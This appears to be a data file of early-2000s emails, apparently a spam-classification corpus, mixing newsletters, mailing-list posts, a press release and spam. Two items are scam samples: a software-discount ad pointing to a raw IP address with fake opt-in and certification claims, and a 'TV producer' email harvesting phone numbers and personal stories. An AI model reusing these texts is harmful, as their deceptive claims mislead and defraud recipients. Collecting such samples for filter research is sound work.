 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Consider This&lt;/b&gt;
 &lt;br&gt;Forwarded by JW
 &lt;p&gt;&lt;a class="url" href="http://www.computerworld.com/securitytopics/security/story/0,10801,72519,00.html"&gt;http://www.computerworld.com/securitytopics/security/story/0,10801,72519,00.html&lt;/a&gt;
 &lt;p&gt;The next time you have a face-to-face with your elected 
 representatives, you might want to start asking about their 
 opinions on technology laws that are being proposed left and 
 right. Holding a public office seems to be introducing brain 
 death more frequently considering proposals by Senator Fritz 
 Hollings and now LA congressman Howard Berman. If Mr. Berman 
 gets his way, companies may very well be allowed to hack 
 into your systems without proof of provocation in order to 
 ensure that you are using their software according to the 
 stated rules. Mind you, if they cause colateral damage or 
 upset other systems, there isn't thing one you can do in 
 return. Nope, they'll have legal protection. This garbage is 
 seriously getting scary. If you think it won't be abused, 
 consider the case of Dimitry Skylarov when he publicly 
 pointed out eBook security problems with Adobe's software 
 and was promptly thrown in jail for his trouble under the 
 authority of the Digital Millenium Copyright Act. He was 
 eventually released, but that doesn't make it any more 
 right.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href="http://www.lockergnome.com/issues/techspecialist/20020710.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020710.html&lt;/a&gt;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</si>
  <si>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Re: Super CHARGE your desktop or laptop today!     17639
</t>
  </si>
  <si>
    <t xml:space="preserve">+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
   Take Control of Your Computer With This Top-of-the-Line Software! 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                  Symantec SystemWorks 2002
               -=Professional Software Suite=-
 This Special Package Includes Six - Yes 6! - Feature-Packed Utilities
 ALL for 1 Special LOW Price of Only $29.99!
 This Software Will:
  - Protect your computer from unwanted and hazardous viruses
  - Help secure your private &amp; valuable information
  - Allow you to transfer files and send e-mails safely
  - Backup your ALL your data quick and easily
  - Improve your PC's performance w/superior integral diagnostics!
  - ***** You'll NEVER have to take your PC to the repair shop AGAIN! *****
         That's SIX, yes, -6- Feature-Packed Utilities @ 1 Great Price!!!
     A $300+ Combined Retail Value YOURS Only $29.99! (Limited Time Offer)
                       &lt; Price Includes FREE Shipping! &gt;
          Why SO Cheap you ask? You are buying ONLINE WHOLESALE,
                   Direct from the Warehouse TO YOU!
                               ~~~ AND ~~~
          FOR A LIMITED TIME BUY 2 OF ANY SOFTWARE &amp; GET 1 FREE!!!!
             Don't fall prey to destructive viruses or programs!
           Protect your computer and your valuable information and...
           ...CLICK HERE TO ORDER NOW! -&gt; http://61.151.247.39/erik/
              OR cut &amp; paste the above link  ^^^^^^^^^^^^^^^^  in your browser's URL bar.
           FOR MORE QUESTIONS, OR TO ORDER CALL US TOLL-FREE ANYTIME!
                          1 - 8 0 0 - 8 6 1 - 1 4 8 1
 We are strongly against sending unsolicited emails to those who do not wish to receive
 our special mailings. You have opted-in to one or more of our affiliate sites requesting
 to be notified of any special offers we may run from time to time. We also have attained
 the services of an independent 3rd party to overlook list management and removal
 services. The list CODE in which you are registered is marked at the bottom of this email.
 If you do not wish to receive further mailings, 
 Please click here -&gt; http://61.151.247.39/erik/remove.asp to be removed from the list.
 Please accept our apologies if you have been sent this email in error. We honor all removal requests. 
 IAES (International Association of Email Security) Approved List. Serial # 9e45tYu2-ssI3USA
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-07-31
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Mac OS X Conference Registration Opens
     * New Pumpking is Crowned
 +--------------------------------------------------------------------+
 | Mac OS X Conference Registration Opens                             |
 |   posted by ziggy on Monday July 29, @22:58 (events)               |
 |   http://use.perl.org/article.pl?sid=02/07/30/0317236              |
 +--------------------------------------------------------------------+
 [0]gnat writes "[1]Registration is now open for the O'Reilly [2]Mac OS X
 Conference. Look for sessions by Randal Schwartz and brian d foy ("[3]Programming
 Perl on Mac OS X"), Dan Sugalski ("[4]Programming Cocoa with Perl"),
 David Wheeler ("[5]Migrating from Linux to Mac OS X"), and many other
 people from the world of Perl."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/07/30/0317236
 Links:
     0. mailto:gnat@oreilly.com
     1. http://conferences.oreillynet.com/pub/w/19/register.html
     2. http://conferences.oreillynet.com/macosx2002/
     3. http://conferences.oreillynet.com/cs/macosx2002/view/e_sess/3281
     4. http://conferences.oreillynet.com/cs/macosx2002/view/e_sess/3114
     5. http://conferences.oreillynet.com/cs/macosx2002/view/e_sess/3155
 +--------------------------------------------------------------------+
 | New Pumpking is Crowned                                            |
 |   posted by pudge on Tuesday July 30, @16:15 (releases)            |
 |   http://use.perl.org/article.pl?sid=02/07/30/2016230              |
 +--------------------------------------------------------------------+
 [0]Dan writes "One of the many things that's come out of this year's TPC
 is the appointment of a new Pumpking. No, not Hugo van der Sanden, who
 hopefully everyone knows is taking on the task of 5.9 and 5.10. No, I'm
 talking about the inimitable Michael Schwern, who's now holder of the
 perl 1 pumpkin and, I'm assured, is well on the way to a new maintenance
 release. Details are over on [1]dev.perl.org. Join the porters list and
 help Schwern out!" Yes, he said "perl 1".
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/07/30/2016230
 Links:
     0. http://yetanother.org/dan/
     1. http://dev.perl.org/perl1/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</si>
  <si>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Iran Pushes UN Intervention Against US
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000643
 Date: 2002-10-07T21:35:22-06:00
 Yahoo: The Case for Regime Change[1].
     Khatami asked the U.N. to set a deadline for Bush to step down in favor of 
     president-in-exile Al Gore the legitimate winner of the 2000 election, the 
     results of which were subverted through widespread voting irregularities 
     and intimidation.  
     [... This will likely require] a prolonged bombing campaign targeting major 
     U.S. cities and military installations, followed by a ground invasion led 
     by European forces. "Civilian casualties would likely be substantial," said 
     a French military analyst. "But the American people must be liberated from 
     tyranny." 
     [...] "Even before Bush, the American political system was a shambles," 
     said Prof. Salvatore Deluna of the University of Madrid. "Their 
     single-party plutocracy will have to be reshaped into true 
     parliamentary-style democracy. Moreover, the economy will have to be 
     retooled from its current military dictatorship model--in which a third of 
     the federal budget goes to arms, and taxes are paid almost exclusively by 
     the working class--to one in which basic human needs such as education and 
     poverty are addressed. Their infrastructure is a mess; they don't even have 
     a national passenger train system. Fixing a failed state of this size will 
     require many years."
 Welcome news. The only way to crush America's fundamentalist tendencies is by 
 showing them who's boss.
 [1] http://story.news.yahoo.com/news?tmpl=story2&amp;cid=127&amp;u=/020927/7/2bxul.html&amp;printer=1
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "SM" == Skip Montanaro &lt;skip@pobox.com&gt; writes:
   Jeremy&gt; Put another way, I'd be interested to hear why you don't
   Jeremy&gt; want to use ZODB.
   SM&gt; Disclaimer: I'm not saying I don't want to use ZODB.  I'm
   SM&gt; offering some reasons why it might not be everyone's obvious
   SM&gt; choice.
 But you're not saying you do want to use ZODB, so you're still part of
 the problem &lt;wink&gt;.
   SM&gt; For most of us who have *any* experience with ZODB it's probably
   SM&gt; all indirect via Zope, so there are probably some inaccurate
   SM&gt; perceptions about it.  These thoughts that have come to my mind
   SM&gt; at one time or another:
   SM&gt; * How could a database from a company (Zope) whose sole business
   SM&gt;       is not databases be more reliable than a database from
   SM&gt;       organizations whose sole raison d'etre is databases
   SM&gt;       (Sleepycat, Postgres, MySQL, ...)?
 I don't think I could argue that ZODB is more reliable that
 BerkeleyDB.  It's true that we have fewer database experts and expend
 fewer resources working on database reliability.  On the other hand,
 Barry is nearly finished with a BerkeleyDB-based storage for ZODB.
 ZODB is an object persistence tool that uses a database behind it.
 You can use our FileStorage or you can use someone else's database,
 although BerkeleyDB is the best we can offer at the moment.  (It would
 be really cool to do a Postgres storage...)
   SM&gt; * Dealing with Zope's monolithic system is frustrating to people
   SM&gt;       (like me) who are used to having files reside in
   SM&gt;       filesystems.  Some of that frustration probably carries
   SM&gt;       over to ZODB, though it's almost certainly not ZODB's
   SM&gt;       problem.
 This sounds like a Zope complaint that doesn't have anything to do
 with ZODB, but maybe I misunderstand you.  You don't have to store
 your code in the database, although that will be mostly possible in
 ZODB4.
 Seriously, ZODB stores object pickles in a database.  The storage
 layer is free to manage those pickles however it likes.  FileStorage
 uses a single file.  Toby Dickenson's DirectoryStorage represents each
 pickle as a separate file.
   SM&gt; * It seems to grow without bound, else why do I need to pack my
   SM&gt;       Data.fs file every now and then?
 It grows without bound unless you pack it.  Why is that a problem? 
 BerkeleyDB log files grow without bound, too.  Databases require some
 tending.  One possibility with FileStorage is to add an explicit
 pack() call to update training operation.  We'd need to think
 carefully about the performance impact.
   SM&gt; Also, there is the issue of availability.  While it's just an
   SM&gt; extra install, its use requires more than the usual Python
   SM&gt; install.  Having it in the core distribution would provide
   SM&gt; stronger assurances that it runs wherever Python runs (e.g.,
   SM&gt; does it run on MacOS 8 or 9, both of which I believe Jack still
   SM&gt; supports with his Mac installer?).
 I think we'd want a spambayes installer that packaged up spambayes,
 python, and zodb.
 Jeremy
 _______________________________________________
 Spambayes mailing list
 Spambayes@python.org
 http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Just Do It!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I am a TV producer for one of the three major networks and
 I am working on a new primetime special. We're looking for a 
 special story and thought you might be able to assist.
 THIS IS NOT A SALES PITCH FOR ANYTHING! 
 I AM REALLY LOOKING FOR A GREAT STORY!
 -----------------
 PLEASE READ THIS! 
 -----------------
 Here's the type of story we are seeking;
 Are you interested in finding a long lost love from 
 your past? 
 Your first love? 
 The one that got away?
 If you are, WE MAY BE ABLE TO MAKE YOUR DREAM COME TRUE!
 (if you are not, PLEASE send this to your single friends)
 To be considered for this rare national TV opportunity, 
 you MUST;
 1. Be single and available
 2. Have a sincere interest to find a former love
 3. Be willing to share your story on NATIONAL TV
 4. Be able to travel to Los Angeles (We pay for everything)
 If this is YOU...then here's what you need to do next-
 1. Reply to this email.
 2. Tell us WHO you are looking for. 
 3. Tell us WHY you want to find him/her. (Let your feelings out)
 4. Tell us WHERE they were last time you saw them (specifics)
 5. Tell us how to reach YOU BY PHONE- HOME, WORK, CELL, email
 If we cannot reach you, we will have to move on without you!
 We only need ONE story, so if you want it to be you...
 REPLY IMMEDIATELY!
 We look forward to getting your reply...SOON!
 Good luck!
 p.s. REMEMBER TO GIVE US A WAY TO REACH YOU BY PHONE TODAY!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Webex Endeavors
</t>
  </si>
  <si>
    <t xml:space="preserve">We have a partnership with Webex.  We use their serivce
 for cross-firewall app sharing--something that Netmeeting/Messenger
 and Sametime require a lot of configuration of firewalls,
 authentications, access controls and user training for.  
 Now Webex has invites, instant meeting launch without any 
 configuration. Users like it as now they have something to do 
 in between Web conferences and places to store and author 
 documents, reschedule meetings, relaunch meetings.  Webex likes 
 it as people are signed on all the time.  
 Greg
 September 19, 2002
   Tadpole's Secure Web Software Subsidiary Endeavors Technology Teams With Web
   Meetings Leader WebEx Communications
   To Provide Best-of-Breed Solution For Extended Group Collaboration During
   and Between Online Meetings
   Web meetings raise the quality of team interaction and communications for
   users of the Web's secure, P2P collaboration network
   ###
   Tadpole Technology plc, the mobile computing and network infrastructure
   group, today announces that its web collaboration subsidiary, Endeavors
   Technology, Inc., has teamed with Web meetings leader, WebEx
   Communications,Inc. to help professionals make better use of corporate time
   and resources, and gain competitive advantage. By integrating the advanced
   communications capabilities of the WebEx platform with Endeavors' secure P2P
   collaboration network, Endeavors has created a new method of world-class
   teamwork and interaction without the hassle of travel.
   With the rapid growth in popularity of Web meetings, the rationale for this
   world-class relationship stems from the growing need for workgroups around
   the world to maintain the quality of the team collaboration experience
   between online meetings. The issue by those preferring not to travel is how
   to continue to collaborate and share information with team members between
   meetings rather than depending on intermittent, insecure email and multiple
   copies of constantly changing documents.
   Inter-meeting collaboration needs an asynchronous medium, independent of
   time. In asynchronous mode, a team member can access, read and edit
   information relevant to the meeting group at his/her convenience rather than
   having to fit into the schedules and timeframes of others. A secured
   environment available only to members of a meeting or project is also
   essential.
   Endeavors' Magi technology converts the Web into a secure platform for
   sharing information directly from people's desktops. WebEx meetings can be
   recorded and reviewed at any time, documents shared in the meeting can be
   actioned in real-time or at a later date, calendars and project schedules
   can be updated at any time, and new individuals added to the workgroup at
   will . all in a secure environment with people working across the globe,
   inside or outside company firewalls.
   Magi peer collaboration securely delivers significant benefits to Web
   meeting participants. Not only can they share and access information at
   will, but they can also know which other participants are online or
   "present." This enables them to chat and message each other, search across
   other people's Magi environment, and work jointly on relevant documents
   highly productively. With Magi collaboration, in tandem with WebEx
   conferencing, the savings can be huge in terms of travel costs, phone bills,
   and, most importantly, timely completion of projects and tasks.
   "In order to realise the full potential of Web meetings, best-of-breed
   services are needed to eliminate time and geographical boundaries," says
   Bernard Hulme, Tadpole's group chief executive. "The powerful combination
   of Endeavors' Magi and WebEx's communications technologies will assist
   global work teams to better meet critical business goals and deadlines by
   maintaining teamwork momentum within and between Web meetings."
   "WebEx is transforming the way businesses use the Web for sales, marketing,
   training, support and product design," says David Farrington, vice president
   of corporate development at WebEx Communications. "By integrating the
   communications capabilities of the WebEx platform with Endeavors' secure
   collaboration network, Endeavors has created an offering that provides the
   best in synchronous and asynchronous communications."
   About Magi
   Magi Enterprise 3.0, an award-winning web collaboration system, transforms
   today's Web into a highly secure inter- and intra-enterprise collaboration
   network of files and web resources. For the first time, enterprises can
   implement ad-hoc Virtual Private Networks for collaboration very rapidly and
   affordably without disrupting existing applications, networks or work
   practices. Magi Enterprise 3.0 does this by effectively transforming
   unsecured, "read-only" Web networks into two-way trusted and transparent
   collaboration environments, through the use of such features as
   cross-firewall connections, advanced data extraction, an intuitive graphical
   interface, and universal name spaces generating "follow me URLs" for mobile
   professionals.
   About Endeavors Technology, Inc.
   Endeavors Technology, Inc. is a wholly-owned subsidiary of mobile computing
   and network infrastructure vendor Tadpole Technology plc (LSE-TAD,
   www.tadpole.com), which has plants and offices in Irvine and Carlsbad
   (California), and Cambridge, Edinburgh, and Bristol (UK). For further
   information on Endeavors' P2P solutions, call 949-833-2800, email to
   p2p@endeavors.com, or visit the company's website http://www.endeavors.com.
   ends
   For further information, please contact:
   Bernard Hulme, Tadpole Technology - via Patcom Media
   Hugh Paterson, Patcom Media - Tel 0207 987 4888, Email
   hughp@patcom-media.com
   Bullets for Editors
   WebEx
   Web communications services (synchronous): network-based platform for
   delivering highly interactive, visually dynamic Web communications. The
   WebEx platform supports real-time data, voice and video communications.
   WebEx is the only company to design, develop and deploy a global network for
   real-time Web communications.
   Magi
   On and off-line (asynchronous) communication and collaboration: cross
   enterprise search and discovery, transparent security and trust (SSL &amp; PKI),
   2-way web access to files and applications, permanent cross firewall access,
   ad hoc and permanent secure groups, centralized or decentralized control of
   access lists and security privileges, centralized caching of information
   (never lose anything critical), multi-device access to information (desktop,
   laptop, PDA).
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: THE WEEK IN REVIEW: Harvest at Macworld
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;THE WEEK IN REVIEW: Harvest at Macworld&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#e5e5e5"&gt;
 &lt;center&gt;
 &lt;a name=3D"top"&gt;&lt;/a&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612 bgcolor=3D"#f=
 fffff"&gt;
 =09&lt;tr valign=3Dtop&gt;
     &lt;td width=3D442 colspan=3D4 bgcolor=3D"#e5e5e5"&gt;
         &lt;img src=3D"http://home.cnet.com/i/ne/ds/dhed.gif" alt=3D"" width=
 =3D"442" height=3D"63" border=3D"0"&gt;&lt;br&gt;
     &lt;/td&gt;
     &lt;td width=3D160 rowspan=3D2&gt;
 &lt;!-- Towerboard --&gt;
 =09&lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2560" scrol=
 ling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" widt=
 h=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /Towerboard --&gt;
 =09&lt;p&gt;
 =09&lt;!-- search form --&gt;
 =09&lt;TABLE border=3D0 cellPadding=3D2 cellSpacing=3D0 width=3D150&gt;
 =09&lt;TR&gt;
 =09&lt;TD&gt;
 =09&lt;form method=3D"GET" action=3D"http://www.search.com/redirect/"&gt;
 =09                &lt;img src=3D"/b.gif" width=3D1 height=3D4&gt;&lt;font face=3D"a=
 rial, helvetica" size=3D"-1"&gt;&lt;br&gt;&amp;nbsp;&lt;b&gt;Search&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 =09                &amp;nbsp;&lt;input type=3D"text" name=3D"q" size=3D"15" value=
 =3D""&gt;&lt;br&gt;
 =09                &amp;nbsp;&lt;select name=3D"target"&gt;
 =09                &lt;option value=3D"http://news.search.com/search?tag=3Dex.=
 ne.newsletter.srch.ne" selected&gt;News.com
 =09                &lt;option value=3D"http://cnet.search.com/search?tag=3Dex.=
 ne.newsletter.srch.cnet"&gt;All CNET&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 =09                &lt;option value=3D"http://www.search.com/search?tag=3Dex.n=
 e.newsletter.srch.web"&gt;The Web
                 &lt;/select&gt;&amp;nbsp;&lt;input type=3D"submit" value=3D"Go!" name=3D=
 "submit"&gt;&lt;/td&gt;&lt;/form&gt;
     &lt;/tr&gt;&lt;/table&gt;
     &lt;!-- /search form --&gt;
     &lt;p&gt;
 &lt;!-- Vertical Brick --&gt;
 &lt;IMG alt=3D"Also from CNET" height=3D20 src=3D"http://home.cnet.com/Ads/Med=
 ia/Images/RHC_ALSOfromCNETnet.gif" width=3D150 NOSEND=3D"1"&gt;&lt;BR&gt;
 &lt;TABLE border=3D0 cellPadding=3D2 cellSpacing=3D0 width=3D150&gt;&lt;TBODY&gt;&lt;TR vA=
 lign=3Dtop&gt;
 &lt;TD&gt;&lt;FONT face=3D"arial, helvetica" size=3D-1&gt;&lt;B&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Daa-gBteQXUQ1C_glmRWLXZBXqO=
 NOVsR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dbf-JtRfQ8ZQwRYB4Kl5w8PF_jE=
 uwtZR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dd4-E0SqQ0EHeeoXJa0_4Mc3148=
 lk6dR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dea-fjLyQhVa-0E5r3-AwQ4lAUw=
 -5WsR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dff-sVoVQmsafnyVitrZxrhBm0W=
 HthZR" &gt;ZDNet: PeopleSoft&lt;/a&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 =09=09&lt;p&gt;
 =09&lt;/td&gt;
 =09&lt;td width=3D9 rowspan=3D2&gt;
 =09=09&lt;table width=3D9 cellpadding=3D0 cellspacing=3D0 border=3D0&gt;
 =09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#e5e5e5"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"9" height=3D"50" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"9" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"9" height=3D"10" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09=09&lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"9" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 =09=09&lt;/table&gt;
 =09&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000" rowspan=3D2&gt;&lt;img src=3D"http://home.cn=
 et.com/i/ne/ds/bkg.gif" width=3D"1" height=3D"50" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;!-- In the News / Special Reports --&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D430 bgcolor=3D"#ffffff"&gt;
 &lt;!-- START COPY FOR THE GUTS --&gt;
 &lt;table cellpadding=3D10 cellspacing=3D0 border=3D0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;b&gt;CNET | NEWS.COM WEEK IN REVIEW&lt;/b&gt;&lt;br&gt;
 The Entire Tech Week in a Single Email&lt;br&gt;
 Saturday, July 20, 2002&lt;p&gt;
 &lt;p&gt;
 &lt;b&gt;Mac fans flocked to the Macworld Expo in New York to watch Apple Compute=
 r trot out new hardware, software and even a Web services plan--but it migh=
 t be a challenge getting people to pay for the offerings.
 &lt;/b&gt;
 &lt;p&gt;
 Apple CEO Steve Jobs kicked off the trade show by &lt;a href=3D"http://clickth=
 ru.online.com/Click?q=3D14-5MRAIF-I438XVu98ZvQIzTKtR1dR" &gt;unveiling&lt;/a&gt; new=
  iPod digital-audio players and a new flat-panel iMac.
 &lt;p&gt;
 The new iPod players include models built specifically for computers that u=
 se Microsoft's Windows operating system. Apple lowered the price of the exi=
 sting 5GB iPod and a redesigned 10GB model, which is thinner and comes with=
  a new case and remote control. Jobs also introduced a beefier 20GB iPod fo=
 r $499. The iPod stable now includes three models for Mac users and three m=
 odels for Windows users with MusicMatch software.
 &lt;p&gt;
 As expected, Jobs introduced a new iMac model with a 17-inch flat-panel mon=
 itor. The model offers a widescreen display with 1,440-by-900-pixel resolut=
 ion versus 1,024-by-768-pixel resolution for the 15-inch iMac.
 &lt;p&gt;
 Jobs also previewed the next version of Mac OS X, version 10.2, which will =
 be on store shelves Aug. 24 for $129. OS X 10.2 includes a new Finder with =
 improved search features, spring-loaded folders and the ability to change t=
 he background photo as often as every 5 seconds.
 &lt;p&gt;
 But fans who rushed to OS X last year learned there's no such thing as a ch=
 eap upgrade when the company announced it will &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3D29-Sg_rIjM3xjSzf59NyGEI9rCM8vcR" &gt;not offer&lt;/a&gt; a disc=
 ounted upgrade version of Mac OS X version 10.2, code-named Jaguar, to curr=
 ent users of the operating system. To get Jaguar, current OS X users will h=
 ave to buy a new Macintosh or an entirely new version of the operating syst=
 em for the retail price of $129.
 &lt;p&gt;
 Apple's decision not to sell a less-expensive upgrade version lay in the qu=
 alitative difference between version 10.1 and 10.2. Although the versions s=
 hare the same core technology, Jaguar includes several new features and ser=
 vices, such as search tool Sherlock 3 and Internet address finder Rendezvou=
 s, which arguably classify it as an entirely new piece of software.
 &lt;p&gt;
 Apple also raised eyebrows by &lt;a href=3D"http://clickthru.online.com/Click?=
 q=3D3e-F51nIizcfoh9HOq_7DQESNPe-iRR" &gt;transitioning&lt;/a&gt; its iTools Web serv=
 ices from a free program to a paid program called .Mac. The company plans t=
 o charge about $100 per year for the program. The collection of Web service=
 s was launched about three years ago, and now includes online storage via a=
  service called iDisk, online greeting cards through iCards and other featu=
 res.
 &lt;p&gt;
 Despite iTool's popularity, the company &lt;a href=3D"http://clickthru.online.=
 com/Click?q=3D53-n86dINniBiqIX-sjHpx8lOheMnlR" &gt;may face a tough sell&lt;/a&gt; w=
 ith the .Mac program. The history of paid services, is not a pretty picture=
 . Customers have bristled when companies try to slap charges on previously =
 free services. Some have succeeded but many have struggled, especially when=
  free alternatives lurked elsewhere. In the early 1990s, Apple's efforts to=
  form online communities and popularize search engines failed magnificently=
 .
 &lt;p&gt;
 To its advantage, Apple has presented a fairly coherent and tangible set of=
  services with .Mac. And although its software division is far more organiz=
 ed than it once was, it's unclear how overwhelming demand will be. However,=
  an &lt;a href=3D"http://clickthru.online.com/Click?q=3D68-iM8qIsPWu8FuzAvywvj=
 sK-FdLP4R" &gt;online petition&lt;/a&gt; protesting the new charges doesn't bode wel=
 l for the program.
 &lt;p&gt;
 &lt;b&gt;&lt;font color=3D"#CC0000"&gt;Microsoft's moves&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Not one to be caught in anyone's shadow, Microsoft plans to &lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D7d-FFEqIDLWMEqg-q9Uywq2NRJSBTeR" &gt;offer a=
  rebate&lt;/a&gt; for its Office suite for Mac OS X to those who buy the software=
  bundle when they pick up a new Mac. The promotion entails a $50 mail-in re=
 bate for people buying a new Mac and upgrading to Office v. X, and $100 for=
  those buying a Mac and the full version of the software.
 &lt;p&gt;
 The offers come after Microsoft revealed that sales of the software have no=
 t met its expectations. The software potentate had expected to sell 750,000=
  copies of Office v. X by now, but instead has sold only 300,000 since the =
 program went on sale last November.
 &lt;p&gt;
 Microsoft is also putting the &lt;a href=3D"http://clickthru.online.com/Click?=
 q=3D93-V4PmQSdrF0o9nH2cTYjvQ8Rgn5FR" &gt;finishing touches&lt;/a&gt; on the third co=
 llection of Windows 2000 bug fixes, which is nearly ready for release after=
  a protracted period of testing. The update, Windows 2000 Service Pack 3, c=
 ontains vital security updates and hundreds of fixes to bugs plaguing the o=
 perating system that Microsoft released in February 2000. Service Pack 3 co=
 uld be important for many businesses, as not all of the included security f=
 ixes are available as separate downloads.
 &lt;p&gt;
 Not everything will be available as a download, however. Weeks before Micro=
 soft plans to reinstate Java in Windows XP, it has &lt;a href=3D"http://clickt=
 hru.online.com/Click?q=3Da8-02XZQQZDjZijEBtDtZs6swzdON9R" &gt;shut down&lt;/a&gt; a =
 site that would automatically send its Java software to Windows XP users. T=
 he company closed the install-on-demand feature 30 days after it told Java =
 inventor Sun Microsystems it would reinstate Java in Windows XP through the=
  forthcoming Service Pack 1 but remove it altogether in 2004.
 &lt;p&gt;
 &lt;b&gt;&lt;font color=3D"#CC0000"&gt;Somebody's watching you&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 You better watch what you write in Yahoo's free e-mail service--because Yah=
 oo is. To protect users from malicious code, Yahoo uses an automated filter=
  to &lt;a href=3D"http://clickthru.online.com/Click?q=3Dbd-c0nUQ7pV9moRKw2pAEV=
 gnfqGsJuR" &gt;swap out&lt;/a&gt; a handful of words such as "mocha" and "eval" that=
  pertain to Web code known as JavaScript.
 &lt;p&gt;
 The reason is that e-mail sent in a form known as "Web enhanced" can contai=
 n JavaScript instructions able to run programs on the recipient's PC. JavaS=
 cript is a Web language that can issue commands such as telling the browser=
  to open up other windows or to prompt a service to change a password, for =
 example.
 &lt;p&gt;
 "Mocha" is one of those special commands that can be run from Web-enhanced =
 e-mail. Typing "mocha:" into the location bar of the Netscape browser will =
 open a screen with a display area and a text box underneath, in which comma=
 nds can be entered. A malicious hacker could, for example, use the command =
 line to run a program that changes a person's password without that person'=
 s knowledge.
 &lt;p&gt;
 On the heels of plans for new powers to patrol people's Web use, the U.S. g=
 overnment is again turning to technology to &lt;a href=3D"http://clickthru.onl=
 ine.com/Click?q=3Dd2-THo_QULs_DzX3rh3Gl22vbAOyesR" &gt;monitor suspicious acti=
 vity&lt;/a&gt; in the name of fighting terrorism. The government has unveiled mor=
 e details of its Terrorist Information and Prevention System (TIPS), a plan=
  to recruit volunteers across the country who will keep tabs on dubious or =
 suspicious behavior.
 &lt;p&gt;
 "The program will involve the millions of American workers who, in the dail=
 y course of their work, are in a unique position to see potentially unusual=
  or suspicious activity in public places," according to the TIPS Web site. =
 But the American Civil Liberties Union, one of several critics of the plan,=
  fears the proposal will encourage racial profiling and vigilantism, possib=
 ly leading to searches of private homes without a warrant.
 &lt;p&gt;
 &lt;b&gt;&lt;font color=3D"#CC0000"&gt;Also of note&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 A handful of entrepreneurial technology companies are &lt;a href=3D"http://cli=
